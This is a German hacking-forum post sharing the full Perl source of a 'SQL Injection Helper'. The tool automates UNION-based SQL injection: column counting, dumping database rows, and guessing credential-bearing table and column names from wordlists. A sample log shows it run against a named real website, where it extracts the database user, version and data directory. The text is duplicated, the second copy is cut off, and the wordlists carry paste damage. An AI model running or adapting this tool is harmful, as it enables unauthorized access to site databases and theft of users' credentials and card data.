fred777
13.06.2010, 15:16
Ich stelle euch hier ein schon etwas älteres Projekt von mir zur Verfügung. Da verschiedene SQL Injection Helper bei mir nicht besonders liefen, ganz abgesehen von Linux, habe ich mir selbst was dazu geschrieben.
Etwas Besonderes ist es nicht, einfach nur hilfreich und nicht so abgefuckt wie schemafuzz :D
Funktionen sind in den Comments zu betrachten.
Bubi ist geschrieben in Perl
Zeilen gesamt -> ähm 310
Auf Wunsch bastel ich noch Proxy- und Threadunterstützung rein ;)
Logfiles werden automatisch generiert und sollten alle wichtigen Informationen enthalten. Für Kritik und Codeverbesserungen bin ich offen :)
Intro
#!/usr/bin/perl
#-------------------------------------------------------------------#
# _ ___ _ ____
# (_)/ _ \| | |___ \
# _| | | | | __ __) |
# | | | | | |/ /|__ <
# | | |_| | < ___) |
# | |\___/|_|\_\____/
# _/ |
# |__/ SQL Injection Helper 1.0
#
#................................................. ...............
#
# + written by fred777
# + (C) 2010 by j0k3 project
# + fred777.5x.to
#
# .................................................. .............
# DAMN INFORMATION SHIT
#
# + Column Counter
# + SQL Data Grabber
# + Name Information Fuzzer
#
# - Column Counter
# - $ perl sql.pl -c <page> <true-word>
# - $ perl sql.pl -c http://seite.de/?d=1 j0k3
#
# - SQL Data Grabber
# - $ perl sql.pl -d <page>
# - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,j0k3
# - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,
# j0k3(table_name1,name2)+from+table
#
# - Name Information Fuzzer
# - $ perl sql.pl -f <page>
# - $ perl sqlp.pl -f http://seite.de/?d=-1+union+select+1,j0k3
#
# .................................................. .............
# DAMN GREETZ
#
# + back2hack, free-hack, creative-coding, scene-coderz, hackbase
# + darkc0de for the n1 table list
# + and teh leet happy ninjas of course :P
#
#-------------------------------------------------------------------#
Logfile - Example:
+-------------------------------------------------------------+
| j0k3 SQL Injection Helper - Logfile |
+-------------------------------------------------------------+
Columns:8
String: http://zuckermais.ch/index.php?id=18+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7 ,8--+
+-------------------------------------------------------------+
| j0k3 SQL Injection Helper - Logfile |
+-------------------------------------------------------------+
Url: http://zuckermais.ch/index.php?id=18+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7 ,j0k3
User: leeger_zuckerm@localhost
MySQL Version: 5.0.90-community
Directory: /var/lib/mysql/
+-------------------------------------------------------------+
| j0k3 SQL Injection Helper - Logfile |
+-------------------------------------------------------------+
Url: http://zuckermais.ch/index.php?id=18+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7 ,UNHEX(HEX(CONCAT_WS(0x3a,99999,table_name,column_ name,99999)))+from+information_schema.columns
Dumping Information:
[0] CHARACTER_SETS:CHARACTER_SET_NAME
[1] CHARACTER_SETS:DEFAULT_COLLATE_NAME
[2] CHARACTER_SETS:DESCRIPTION
[3] CHARACTER_SETS:MAXLEN
[4] COLLATIONS:COLLATION_NAME
[5] COLLATIONS:CHARACTER_SET_NAME
[6] COLLATIONS:ID
[7] COLLATIONS:IS_DEFAULT
[8] COLLATIONS:IS_COMPILED
[9] COLLATIONS:SORTLEN
[10] COLLATION_CHARACTER_SET_APPLICABILITY:COLLATION_NAME
[11] COLLATION_CHARACTER_SET_APPLICABILITY:CHARACTER_SET_NAME
[12] COLUMNS:TABLE_CATALOG
[13] COLUMNS:TABLE_SCHEMA
[14] COLUMNS:TABLE_NAME
+-------------------------------------------------------------+
| j0k3 SQL Injection Helper - Logfile |
+-------------------------------------------------------------+
Url: http://zuckermais.ch/index.php?id=18+and+1=0+union+select+1,2,3,4,5,6,7 ,j0k3
Scanning Tables:
+ information_schema.columns -> Scanning Columns:
- table_name
- column_name
Script:
#!/usr/bin/perl
#-------------------------------------------------------------------#
# _ ___ _ ____
# (_)/ _ \| | |___ \
# _| | | | | __ __) |
# | | | | | |/ /|__ <
# | | |_| | < ___) |
# | |\___/|_|\_\____/
# _/ |
# |__/ SQL Injection Helper 1.0
#
#................................................. ...............
#
# + written by fred777
# + (C) 2010 by j0k3 project
# + fred777.5x.to
#
# .................................................. .............
# DAMN INFORMATION SHIT
#
# + Column Counter
# + SQL Data Grabber
# + Name Information Fuzzer
#
# - Column Counter
# - $ perl sql.pl -c <page> <true-word>
# - $ perl sql.pl -c http://seite.de/?d=1 j0k3
#
# - SQL Data Grabber
# - $ perl sql.pl -d <page>
# - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,j0k3
# - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,
# j0k3(table_name1,name2)+from+table
#
# - Name Information Fuzzer
# - $ perl sql.pl -f <page>
# - $ perl sqlp.pl -f http://seite.de/?d=-1+union+select+1,j0k3
#
# .................................................. .............
# DAMN GREETZ
#
# + back2hack, free-hack, creative-coding, scene-coderz, hackbase
# + darkc0de for the n1 table list
# + and teh leet happy ninjas of course :P
#
#-------------------------------------------------------------------#
use strict;
use warnings;
use LWP::UserAgent;
# Startup banner; $|++ turns off output buffering so each progress line is
# flushed as soon as it is printed.
print q
{
+-------------------------------------------------------------+
| SQL Injection Helper 1.0 |
| |
| + Column Counter |
| + SQL Data Grabber |
| + Name Information-Fuzzer |
| |
| < j0k3 > (C) by fred777 |
+-------------------------------------------------------------+
}; $|++;
# Positional arguments: mode switch, target URL and, for -c only, the word
# expected in a "true" response. Declared with 'our' so the subs below can
# read them. Nothing checks for missing arguments; an absent $op or $url
# reaches the regexes below as undef.
our ($op,$url,$true) = @ARGV;
# $file is the log that writing() appends to; $lim is the LIMIT row count
# used by selects().
our ($file,$lim) = ('log.txt',1000);
# Shared HTTP client, created with no options, so LWP's defaults apply.
our $ua = LWP::UserAgent->new();
my $head =
"+-------------------------------------------------------------+\n".
"| j0k3 SQL Injection Helper - Logfile |\n".
"+-------------------------------------------------------------+\n";
# NOTE(review): this check is case-insensitive (/i) but the dispatch below
# uses case-sensitive eq, so e.g. '-D' passes validation, writes the log
# header, and then no mode runs.
usage() unless $op =~ m:^-d$|^-c$|^-f$:i;
# Only plain http:// targets are accepted; anything else goes to usage().
usage() unless $url =~ m.^http://.;
# The log header is written before the selected mode starts.
writing($head);
order() if($op eq '-c');
selects() if($op eq '-d');
fuzz() if($op eq '-f');
sub order {
# Column counter (-c). Sends ORDER+BY+$i for $i = 1, 2, ... until the
# response no longer contains $true, then reports $i-1 columns and a
# UNION SELECT template with that many numbered placeholders.
error() if(!$true);
my ($resp,$i,$str) = (0,0,"$url+AND+1=0+UNION+SELECT+1");
do {
$i++;
# NOTE(review): LWP::UserAgent->get returns an HTTP::Response object even
# when the request fails, so this 'or die' never fires; a transport or
# HTTP error is only noticed if the error page happens not to contain
# $true. Nothing bounds $i, and $true is interpolated into the pattern
# unescaped, so regex metacharacters in the argument change the test.
$resp = $ua->get("$url+ORDER+BY+$i--+") or die "\n$!\n";
} while($resp->content =~ m:$true:i);
# Placeholders 2..$i-1 are appended after the "1" already in $str.
$str .= ",$_" for (2..$i-1);
printf("\nColumns: %d\nString: %s\n",$i-1,"$str--+");
writing("\nColumns:".($i-1)."\nString: $str--+\n\n");
}
sub selects {
# Data grabber (-d). Two shapes of $url are handled: a bare j0k3 marker
# with no FROM clause (user/version/datadir probe), and
# j0k3(col1,col2,...)+from+table (row dump). In both cases j0k3 is replaced
# by a CONCAT_WS expression bracketed with 99999 so the values can be picked
# out of the page with a regex.
# NOTE(review): this first test is case-sensitive while the elsif below is
# not, so a URL written with FROM in upper case takes this branch.
if($url =~ m:.+j0k3: && $url !~ m:.+from.+:) {
# '@ @datadir' contains a space, like other wrapped tokens in this paste.
my $inf = 'UNHEX(HEX(CONCAT_WS(0x3a,99999,user(),version(),@ @datadir,99999)))';
my $st = replace($url,'j0k3',$inf);
# 'or die' never fires here: get() returns a response object on failure too.
my $resp = $ua->get("$st--+") or die "\n$!\n";
# The match result is not checked; on a miss $1..$3 are unset (the previous
# match in this scope has no capture groups), so the log records empty
# fields and 'use warnings' noise rather than a failure.
$resp->content =~ m![9]{5}:(.+):(.+):(.+):[9]{5}!i;
my $t = "\nUrl: $url\n\nUser: $1\nMySQL Version: $2\nDirectory: $3\n\n";
print $t; writing($t);
}
elsif($url =~ m:.+from.+:i) {
my ($c,$resp) = (0,0);
# Unchecked match; $1 is the column list inside j0k3(...) when it matched.
$url =~ m:j0k3\((.+)\):i;
my $str = "UNHEX(HEX(CONCAT_WS(0x3a,99999,$1,99999)))";
# replace() uses its second argument as a regex, hence the escaped
# parentheses; $1 itself is not escaped.
my $st = replace($url,'j0k3\('.$1.'\)',$str);
print "\nDumping Information:\n\n"; writing("\nUrl: $st\n\nDumping Information:\n\n");
# One request per row, advancing the LIMIT offset $c by one each time;
# stops when a page has no bracketed value or contains the word "error".
do {
$resp = $ua->get("$st+LIMIT+$c,$lim--+") or die "\n$!\n";
# Unchecked match: if it misses, $1 still holds an earlier capture and
# that is what gets printed for this index.
$resp->content =~ m![9]{5}:(.*):[9]{5}!;
print "[$c] $1\n"; writing("[$c] $1\n");
$c++;
} while($resp->content =~ m![9]{5}:(.+):[9]{5}! && $resp->content !~ m:error:i);
}
else {
error();
}
}
sub fuzz {
# Name fuzzer (-f). For every name in @tables, j0k3 in $url is replaced by
# the marker 99999 (9x5) and the query is sent with +FROM+$tab; if the
# marker shows up in the page and the page contains no "error", every name
# in @columns is then tried against that table the same way.
# Table wordlist (credited to darkc0de in the header). Several entries
# contain a stray space ('account s', 'log in_admins', ...) that looks like
# line-wrap damage from the forum paste; they are sent as written.
my @tables =(
'user','admin','users','admins','account','account s','adm','admin_login',
'member','memberlist','members','login_admin','log in_admins','login_user',
'login_users','logins','logon','logs','admin_user' ,'admin_userinfo','administer',
'administrable','administrate','administration','a dministrator','administrators',
'adminrights','adminuser','login','mambo_session', 'mambo_users','manage','Logins',
'manager','mb_users','mybb_users','e107.e107_user' ,'e107_user','Admins','Login',
'phorum_users','phpads_clients','phpads_config','p hpbb_users','phpBB2.forum_users',
'tbladmins','sort','_wfspro_admin','4images_users' ,'a_admin','art','article_admin',
'articles','artikel','aut','author','autore','back end','backend_users','backenduser',
'chat_config','chat_messages','chat_users','client ','clients','clubconfig',
'company','config','contact','contacts','content', 'control','cpg_config',
'cpg132_users','customer','customers','customers_b asket','dbadmins','dealer',
'dealers','diary','download','forum.ibf_members',' fusion_user_groups',
'fusion_users','group','groups','ibf_admin_session s','ibf_conf_settings',
'ibf_members','ibf_members_converge','ibf_sessions ','icq','images','index',
'info','ipb.ibf_members','ipb_sessions','joomla_us ers','jos_blastchatc_users',
'jos_comprofiler_members','jos_contact_details','j os_joomblog_users',
'jos_messages_cfg','jos_moschat_users','jos_users' ,'knews_lostpass','korisnici',
'kpro_adminlogs','kpro_user','links','lost_pass',' lost_passwords','movie','movies',
'lostpass','lostpasswords','m_admin','main','minib btable_users','mitglieder',
'mysql','mysql.user','name','names','news','news_l ostpass','newsletter',
'nuke_authors','nuke_bbconfig','nuke_config','nuke _popsettings','nuke_users',
'obb_profiles','order','orders','parol','partner', 'partners','passes','password',
'passwords','perdorues','perdoruesit','phorum_sess ion','phorum_user',
'phpBB2.phpbb_users','phpmyadmin.pma_table_info',' pma_table_info','poll_user',
'punbb_users','pwd','pwds','reg_user','reg_users', 'registered','reguser','regusers',
'session','sessions','settings','shop.cards','shop .orders','site_login',
'site_logins','sitelogin','sitelogins','sites','sm allnuke_members','smf_members',
'SS_orders','statistics','superuser','sysadmin','s ysadmins','system','sysuser',
'sysusers','table','tables','tb_admin','tb_adminis trator','tb_login','tb_member',
'tb_members','tb_user','tb_username','tb_usernames ','tb_users','tbl','tbl_user',
'tbl_users','tbluser','tbl_clients','tbl_client',' tblclients','tblclient','test',
'usebb_members','user_admin','user_info','user_lis t','user_login','user_logins',
'user_names','usercontrol','userinfo','userlist',' userlogins','username','usernames',
'userrights','users','vb_user','vbulletin_session' ,'vbulletin_user','voodoo_members',
'webadmin','webadmins','webmaster','webmasters','w ebuser','webusers','x_admin',
'xoops_bannerclient','xoops_users','yabb_settings' ,'yabbse_settings','ActiveDataFeed',
'Category','CategoryGroup','ChicksPass','ClickTrac k','Country','CountryCodes1',
'DataFeedShowtag1','DataFeedShowtag2','DataFeedSho wtag2_incoming','dtproperties',
'Event','Event_backup','Event_Category','EventRedi rect','Events_new','Genre',
'JamPass','MyTicketek','MyTicketekArchive','News', 'Promotion','Region',
'SearchOptions','Series','Sheldonshows','StateList ','States','SubCategory',
'Subjects','Survey','SurveyAnswer','SurveyAnswerOp en','SurveyQuestion','SurveyRespondent',
'sysconstraints','syssegments','tblRestrictedPassw ords','tblRestrictedShows',
'Ticket System Acc Numbers','TimeDiff','Titles','Total Members','UserPreferences',
'uvw_Category','uvw_Preferences','Venue','venues', 'VenuesNew','stone list',
'tblArtistCategory','tblArtists','tblConfigs','tbl Layouts','tblLogBookAuthor',
'tblLogBookImages','tblLogBookImport','tblLogBookU ser','tblMails','tblNewCategory',
'tblNews','tblOrders','tblStoneCategory','tblStone s','tblUser','tblWishList',
'viewLogBookEntry','viewStoneArtist','vwListAllAva ilable','CC_info',
'CC_username','cms_user','cms_users','cms_admin',' cms_admins','user_name',
'jos_user','table_user','email','mail','bulletin', 'cc_info','login_name',
'admuserinfo','userlistuser_list','SiteLogin','Sit e_Login','UserAdmin',
);
# Column wordlist; same paste damage ('pass ', 'custom ers_email_address',
# 'cvvnumber]', ...).
my @columns = (
'user','name','username','password','passwd','pass ','benutzername','passwort',
'cc_number','id','email','pwd','user_name','custom ers_email_address',
'customers_password','user_password','user_pass',' admin_user','admin_password',
'admin_pass','usern','user_n','username1','passwor d1','email1','id1',
'users','login','logins','login_user','login_admin ','login_username','user_username',
'user_login','auid','apwd','adminid','admin_id','a dminuser','adminuserid',
'admin_userid','adminusername','admin_username','a dminname','admin_name',
'usr','usr_n','usrname','usr_name','usrpass','usr_ pass','usrnam','nc','uid',
'userid','user_id','myusername','mail','emni','log ohu','punonjes','kpro_user',
'wp_users','emniplote','perdoruesi','perdorimi','p unetoret','logini','llogaria',
'kodi','emer','ime','korisnik','korisnici','user1' ,'administrator','text',
'administrator_name','mem_login','login_password', 'login_pass','login_passwd',
'login_pwd','sifra','lozinka','psw','pass1word','p ass_word','passw','pass_w',
'user_passwd','userpass','userpassword','userpwd', 'user_pwd','useradmin',
'user_admin','mypassword','passwrd','admin_pwd','a dmin_passwd','mem_password',
'memlogin','e_mail','usrn','u_name','uname','mempa ssword','mem_pass',
'mem_passwd','mem_pwd','p_word','pword','p_assword ','myname','my_username',
'my_name','my_password','my_email','cvvnumber','ab out','access','accnt',
'accnts','account','accounts','admin','adminemail' ,'adminlogin','adminmail',
'admins','aid','aim','auth','authenticate','authen tication','blog','cc_expires',
'cc_owner','cc_type','cfg','cid','clientname','cli entpassword','clientusername',
'conf','config','contact','converge_pass_hash','co nverge_pass_salt','crack',
'customer','customers','cvvnumber]','data','db_database_name','db_hostname',
'db_password','db_username','download','e-mail','emailaddress','full','gid',
'group','group_name','hash','hashsalt','homepage', 'icq','icq_number','id_group',
'id_member','images','index','ip_address','last_ip ','last_login','lastname',
'log','login_name','login_pw','loginkey','loginout ','logo','md5hash','member',
'member_id','member_login_key','member_name','memb erid','membername','members',
'new','news','nick','number','nummer','pass_hash', 'passwordsalt','passwort',
'personal_key','phone','privacy','pw','pwrd','salt ','search','secretanswer',
'secretquestion','serial','session_member_id','ses sion_member_login_key','sesskey',
'setting','sid','spacer','status','store','store1' ,'store2','store3','store4',
'table_prefix','temp_pass','temp_password','temppa ss','temppasword','text','un',
'user_email','user_icq','user_ip','user_level','us er_passw','user_pw','user_pword',
'user_pwrd','user_un','user_uname','user_usernm',' user_usernun','user_usrnm',
'userip','userlogin','usernm','userpw','usr2','usr nm','usrs','warez','xar_name',
'xar_pass');
print "\nUrl: $url\n"; writing("\nUrl: $url\n");
print "\nScanning Tables:\n"; writing("\nScanning Tables:\n");
# One GET per table, plus one per column for each table that matches.
# No 'or die' here and the HTTP status is never looked at, only the body;
# nothing stops the loop on transport errors.
foreach my $tab (@tables) {
# 9x5 is string repetition: the literal "99999".
my $re = replace($url,'j0k3',9x5);
my $resp = $ua->get("$re+FROM+$tab--+");
# [^,] before the marker: presumably so the ",99999" that is just the
# request URL echoed back into the page does not count - TODO confirm.
if($resp->content =~ m:[^,][9]{5}: && $resp->content !~ m:error:i) {
print "+ $tab -> Scanning Columns:\n";
writing("+ $tab -> Scanning Columns:\n");
foreach my $col (@columns) {
$re = replace($url,'j0k3',"CONCAT(99999,0x3a,$col)");
$resp = $ua->get("$re+FROM+$tab+LIMIT+0,1--+");
# Same idea with [^(]: the marker inside the echoed "CONCAT(99999,..."
# is excluded - TODO confirm.
if($resp->content =~ m:[^(][9]{5}: && $resp->content !~ m:error:i) {
print "- $col\n"; writing("- $col\n");
}
}
}
}
}
sub replace {
    # Return a copy of the subject string in which the first match of the
    # pattern (treated as a regex, not a literal) is replaced by the given
    # replacement text. The caller's variable is never modified.
    my ($subject, $pattern, $replacement) = @_;
    my $result = $subject;
    $result =~ s/$pattern/$replacement/;
    return $result;
}
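sub writing {
    # Append $text to the log file named by the package global $file.
    #
    # Three-argument open with a lexical handle: the mode is fixed to '>>'
    # and cannot be altered by whatever $file contains, and the handle does
    # not leak into the global namespace. close() is checked because errors
    # from buffered writes only surface there.
    my $text = shift;
    open my $fh, '>>', $file or die "\n$!\n";
    print {$fh} $text;
    close $fh or die "\n$!\n";
    return;
}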
sub error {
    # Print a framed pointer to the usage text and terminate. The heredoc is
    # single-quoted so the '$' in the hint is literal.
    print <<'END_ERROR';
+-------------------------------------------------------------+
| Error: Read Usage! - $ perl sql.pl |
+-------------------------------------------------------------+
END_ERROR
    exit;
}
sub usage {
    # Print the framed usage text (leading blank line included, no
    # interpolation: the '$' signs are literal) and terminate.
    print <<'END_USAGE';

+-------------------------------------------------------------+
| INFORMATION |
+-------------------------------------------------------------+
| |
| Column Counter: |
| $ perl sql.pl -c <url> <true-word> |
| $ perl sql.pl -c http://seite.de/?id=7 j0k3 |
| |
| SQL Data Grabber: |
| $ perl sql.pl -d <url> |
| $ perl sql.pl -d http://seite.de/?id=-7+union+select |
| +1,j0k3 |
| $ perl sql.pl -d http://seite.de/?id=-7+union+select+1, |
| j0ke(column1,column2)+from+table |
| |
| Name Information Fuzzer: |
| $perl sql.pl -f <url> |
| $perl sql.pl -f http://seite.de/?id=-7+union+select |
| +1,j0k3 |
| |
| < j0k3 > |
+-------------------------------------------------------------+
END_USAGE
    exit;
}
# EOF - < j0k3 > - > 06.2010 - version 1.0
Etwas Besonderes ist es nicht, einfach nur hilfreich und nicht so abgefuckt wie schemafuzz :D
Funktionen sind in den Comments zu betrachten.
Bubi ist geschrieben in Perl
Zeilen gesamt -> ähm 310
Auf Wunsch bastel ich noch Proxy- und Threadunterstützung rein ;)
Logfiles werden automatisch generiert und sollten alle wichtigen Informationen enthalten. Für Kritik und Codeverbesserungen bin ich offen :)
Intro
#!/usr/bin/perl
#-------------------------------------------------------------------#
# _ ___ _ ____
# (_)/ _ \| | |___ \
# _| | | | | __ __) |
# | | | | | |/ /|__ <
# | | |_| | < ___) |
# | |\___/|_|\_\____/
# _/ |
# |__/ SQL Injection Helper 1.0
#
#................................................. ...............
#
# + written by fred777
# + (C) 2010 by j0k3 project
# + fred777.5x.to
#
# .................................................. .............
# DAMN INFORMATION SHIT
#
# + Column Counter
# + SQL Data Grabber
# + Name Information Fuzzer
#
# - Column Counter
# - $ perl sql.pl -c <page> <true-word>
# - $ perl sql.pl -c http://seite.de/?d=1 j0k3
#
# - SQL Data Grabber
# - $ perl sql.pl -d <page>
# - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,j0k3
# - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,
# j0k3(table_name1,name2)+from+table
#
# - Name Information Fuzzer
# - $ perl sql.pl -f <page>
# - $ perl sqlp.pl -f http://seite.de/?d=-1+union+select+1,j0k3
#
# .................................................. .............
# DAMN GREETZ
#
# + back2hack, free-hack, creative-coding, scene-coderz, hackbase
# + darkc0de for the n1 table list
# + and teh leet happy ninjas of course :P
#
#-------------------------------------------------------------------#
Logfile - Example:
+-------------------------------------------------------------+
| j0k3 SQL Injection Helper - Logfile |
+-------------------------------------------------------------+
Columns:8
String: http://zuckermais.ch/index.php?id=18+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7 ,8--+
+-------------------------------------------------------------+
| j0k3 SQL Injection Helper - Logfile |
+-------------------------------------------------------------+
Url: http://zuckermais.ch/index.php?id=18+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7 ,j0k3
User: leeger_zuckerm@localhost
MySQL Version: 5.0.90-community
Directory: /var/lib/mysql/
+-------------------------------------------------------------+
| j0k3 SQL Injection Helper - Logfile |
+-------------------------------------------------------------+
Url: http://zuckermais.ch/index.php?id=18+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7 ,UNHEX(HEX(CONCAT_WS(0x3a,99999,table_name,column_ name,99999)))+from+information_schema.columns
Dumping Information:
[0] CHARACTER_SETS:CHARACTER_SET_NAME
[1] CHARACTER_SETS:DEFAULT_COLLATE_NAME
[2] CHARACTER_SETS:DESCRIPTION
[3] CHARACTER_SETS:MAXLEN
[4] COLLATIONS:COLLATION_NAME
[5] COLLATIONS:CHARACTER_SET_NAME
[6] COLLATIONS:ID
[7] COLLATIONS:IS_DEFAULT
[8] COLLATIONS:IS_COMPILED
[9] COLLATIONS:SORTLEN
[10] COLLATION_CHARACTER_SET_APPLICABILITY:COLLATION_NAME
[11] COLLATION_CHARACTER_SET_APPLICABILITY:CHARACTER_SET_NAME
[12] COLUMNS:TABLE_CATALOG
[13] COLUMNS:TABLE_SCHEMA
[14] COLUMNS:TABLE_NAME
+-------------------------------------------------------------+
| j0k3 SQL Injection Helper - Logfile |
+-------------------------------------------------------------+
Url: http://zuckermais.ch/index.php?id=18+and+1=0+union+select+1,2,3,4,5,6,7 ,j0k3
Scanning Tables:
+ information_schema.columns -> Scanning Columns:
- table_name
- column_name
Script:
#!/usr/bin/perl
#-------------------------------------------------------------------#
# _ ___ _ ____
# (_)/ _ \| | |___ \
# _| | | | | __ __) |
# | | | | | |/ /|__ <
# | | |_| | < ___) |
# | |\___/|_|\_\____/
# _/ |
# |__/ SQL Injection Helper 1.0
#
#................................................. ...............
#
# + written by fred777
# + (C) 2010 by j0k3 project
# + fred777.5x.to
#
# .................................................. .............
# DAMN INFORMATION SHIT
#
# + Column Counter
# + SQL Data Grabber
# + Name Information Fuzzer
#
# - Column Counter
# - $ perl sql.pl -c <page> <true-word>
# - $ perl sql.pl -c http://seite.de/?d=1 j0k3
#
# - SQL Data Grabber
# - $ perl sql.pl -d <page>
# - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,j0k3
# - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,
# j0k3(table_name1,name2)+from+table
#
# - Name Information Fuzzer
# - $ perl sql.pl -f <page>
# - $ perl sqlp.pl -f http://seite.de/?d=-1+union+select+1,j0k3
#
# .................................................. .............
# DAMN GREETZ
#
# + back2hack, free-hack, creative-coding, scene-coderz, hackbase
# + darkc0de for the n1 table list
# + and teh leet happy ninjas of course :P
#
#-------------------------------------------------------------------#
use strict;
use warnings;
use LWP::UserAgent;
# Startup banner; $|++ turns off output buffering so each progress line is
# flushed as soon as it is printed.
print q
{
+-------------------------------------------------------------+
| SQL Injection Helper 1.0 |
| |
| + Column Counter |
| + SQL Data Grabber |
| + Name Information-Fuzzer |
| |
| < j0k3 > (C) by fred777 |
+-------------------------------------------------------------+
}; $|++;
# Positional arguments: mode switch, target URL and, for -c only, the word
# expected in a "true" response. Declared with 'our' so the subs below can
# read them. Nothing checks for missing arguments; an absent $op or $url
# reaches the regexes below as undef.
our ($op,$url,$true) = @ARGV;
# $file is the log that writing() appends to; $lim is the LIMIT row count
# used by selects().
our ($file,$lim) = ('log.txt',1000);
# Shared HTTP client, created with no options, so LWP's defaults apply.
our $ua = LWP::UserAgent->new();
my $head =
"+-------------------------------------------------------------+\n".
"| j0k3 SQL Injection Helper - Logfile |\n".
"+-------------------------------------------------------------+\n";
# NOTE(review): this check is case-insensitive (/i) but the dispatch below
# uses case-sensitive eq, so e.g. '-D' passes validation, writes the log
# header, and then no mode runs.
usage() unless $op =~ m:^-d$|^-c$|^-f$:i;
# Only plain http:// targets are accepted; anything else goes to usage().
usage() unless $url =~ m.^http://.;
# The log header is written before the selected mode starts.
writing($head);
order() if($op eq '-c');
selects() if($op eq '-d');
fuzz() if($op eq '-f');
sub order {
# Column counter (-c). Sends ORDER+BY+$i for $i = 1, 2, ... until the
# response no longer contains $true, then reports $i-1 columns and a
# UNION SELECT template with that many numbered placeholders.
error() if(!$true);
my ($resp,$i,$str) = (0,0,"$url+AND+1=0+UNION+SELECT+1");
do {
$i++;
# NOTE(review): LWP::UserAgent->get returns an HTTP::Response object even
# when the request fails, so this 'or die' never fires; a transport or
# HTTP error is only noticed if the error page happens not to contain
# $true. Nothing bounds $i, and $true is interpolated into the pattern
# unescaped, so regex metacharacters in the argument change the test.
$resp = $ua->get("$url+ORDER+BY+$i--+") or die "\n$!\n";
} while($resp->content =~ m:$true:i);
# Placeholders 2..$i-1 are appended after the "1" already in $str.
$str .= ",$_" for (2..$i-1);
printf("\nColumns: %d\nString: %s\n",$i-1,"$str--+");
writing("\nColumns:".($i-1)."\nString: $str--+\n\n");
}
sub selects {
# Data grabber (-d). Two shapes of $url are handled: a bare j0k3 marker
# with no FROM clause (user/version/datadir probe), and
# j0k3(col1,col2,...)+from+table (row dump). In both cases j0k3 is replaced
# by a CONCAT_WS expression bracketed with 99999 so the values can be picked
# out of the page with a regex.
# NOTE(review): this first test is case-sensitive while the elsif below is
# not, so a URL written with FROM in upper case takes this branch.
if($url =~ m:.+j0k3: && $url !~ m:.+from.+:) {
# '@ @datadir' contains a space, like other wrapped tokens in this paste.
my $inf = 'UNHEX(HEX(CONCAT_WS(0x3a,99999,user(),version(),@ @datadir,99999)))';
my $st = replace($url,'j0k3',$inf);
# 'or die' never fires here: get() returns a response object on failure too.
my $resp = $ua->get("$st--+") or die "\n$!\n";
# The match result is not checked; on a miss $1..$3 are unset (the previous
# match in this scope has no capture groups), so the log records empty
# fields and 'use warnings' noise rather than a failure.
$resp->content =~ m![9]{5}:(.+):(.+):(.+):[9]{5}!i;
my $t = "\nUrl: $url\n\nUser: $1\nMySQL Version: $2\nDirectory: $3\n\n";
print $t; writing($t);
}
elsif($url =~ m:.+from.+:i) {
my ($c,$resp) = (0,0);
# Unchecked match; $1 is the column list inside j0k3(...) when it matched.
$url =~ m:j0k3\((.+)\):i;
my $str = "UNHEX(HEX(CONCAT_WS(0x3a,99999,$1,99999)))";
# replace() uses its second argument as a regex, hence the escaped
# parentheses; $1 itself is not escaped.
my $st = replace($url,'j0k3\('.$1.'\)',$str);
print "\nDumping Information:\n\n"; writing("\nUrl: $st\n\nDumping Information:\n\n");
# One request per row, advancing the LIMIT offset $c by one each time;
# stops when a page has no bracketed value or contains the word "error".
do {
$resp = $ua->get("$st+LIMIT+$c,$lim--+") or die "\n$!\n";
# Unchecked match: if it misses, $1 still holds an earlier capture and
# that is what gets printed for this index.
$resp->content =~ m![9]{5}:(.*):[9]{5}!;
print "[$c] $1\n"; writing("[$c] $1\n");
$c++;
} while($resp->content =~ m![9]{5}:(.+):[9]{5}! && $resp->content !~ m:error:i);
}
else {
error();
}
}
sub fuzz {
# Name fuzzer (-f). For every name in @tables, j0k3 in $url is replaced by
# the marker 99999 (9x5) and the query is sent with +FROM+$tab; if the
# marker shows up in the page and the page contains no "error", every name
# in @columns is then tried against that table the same way.
# Table wordlist (credited to darkc0de in the header). Several entries
# contain a stray space ('account s', 'log in_admins', ...) that looks like
# line-wrap damage from the forum paste; they are sent as written.
my @tables =(
'user','admin','users','admins','account','account s','adm','admin_login',
'member','memberlist','members','login_admin','log in_admins','login_user',
'login_users','logins','logon','logs','admin_user' ,'admin_userinfo','administer',
'administrable','administrate','administration','a dministrator','administrators',
'adminrights','adminuser','login','mambo_session', 'mambo_users','manage','Logins',
'manager','mb_users','mybb_users','e107.e107_user' ,'e107_user','Admins','Login',
'phorum_users','phpads_clients','phpads_config','p hpbb_users','phpBB2.forum_users',
'tbladmins','sort','_wfspro_admin','4images_users' ,'a_admin','art','article_admin',
'articles','artikel','aut','author','autore','back end','backend_users','backenduser',
'chat_config','chat_messages','chat_users','client ','clients','clubconfig',
'company','config','contact','contacts','content', 'control','cpg_config',
'cpg132_users','customer','customers','customers_b asket','dbadmins','dealer',
'dealers','diary','download','forum.ibf_members',' fusion_user_groups',
'fusion_users','group','groups','ibf_admin_session s','ibf_conf_settings',
'ibf_members','ibf_members_converge','ibf_sessions ','icq','images','index',
'info','ipb.ibf_members','ipb_sessions','joomla_us ers','jos_blastchatc_users',
'jos_comprofiler_members','jos_contact_details','j os_joomblog_users',
'jos_messages_cfg','jos_moschat_users','jos_users' ,'knews_lostpass','korisnici',
'kpro_adminlogs','kpro_user','links','lost_pass',' lost_passwords','movie','movies',
'lostpass','lostpasswords','m_admin','main','minib btable_users','mitglieder',
'mysql','mysql.user','name','names','news','news_l ostpass','newsletter',
'nuke_authors','nuke_bbconfig','nuke_config','nuke _popsettings','nuke_users',
'obb_profiles','order','orders','parol','partner', 'partners','passes','password',
'passwords','perdorues','perdoruesit','phorum_sess ion','phorum_user',
'phpBB2.phpbb_users','phpmyadmin.pma_table_info',' pma_table_info','poll_user',
'punbb_users','pwd','pwds','reg_user','reg_users', 'registered','reguser','regusers',
'session','sessions','settings','shop.cards','shop .orders','site_login',
'site_logins','sitelogin','sitelogins','sites','sm allnuke_members','smf_members',
'SS_orders','statistics','superuser','sysadmin','s ysadmins','system','sysuser',
